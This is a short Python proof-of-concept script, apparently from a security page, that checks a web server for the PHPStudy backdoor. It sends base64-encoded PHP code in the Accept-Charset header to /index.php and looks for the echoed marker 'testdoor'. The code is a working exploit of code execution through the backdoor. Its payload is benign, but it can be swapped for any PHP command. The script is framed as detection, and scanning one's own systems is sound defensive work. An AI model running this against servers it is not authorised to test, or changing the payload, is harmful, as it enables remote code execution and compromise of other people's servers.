Phpstudy backdoor
#!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
name: phpstudy后门
referer: unknown
author: qianxiao996
description: phpstudy后门探测
'''
import sys
import requests
import warnings
import base64
def run(url):
result = ['phpstudy后门', '', '']
payload = "echo \"testdoor\";"
payload = base64.b64encode(payload.encode('utf-8'))
payload = str(payload, 'utf-8')
headers = {
'Upgrade-Insecure-Requests': '1',
'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3',
'Accept-Language': 'zh-CN,zh;q=0.9',
'accept-charset': payload,
'Accept-Encoding': 'gzip,deflate',
'Connection': 'close',
}
try:
req = requests.get(url=url+'/index.php', headers=headers, verify=False,timeout=30)
if "testdoor" in req.text:
result[2]= '存在'
else:
result[2]= '不存在'
except:
result[2]= '不存在'
# print(result)
return result
if __name__ == "__main__":
warnings.filterwarnings("ignore")
testVuln = run(sys.argv[1])
最后更新: 2023-10-12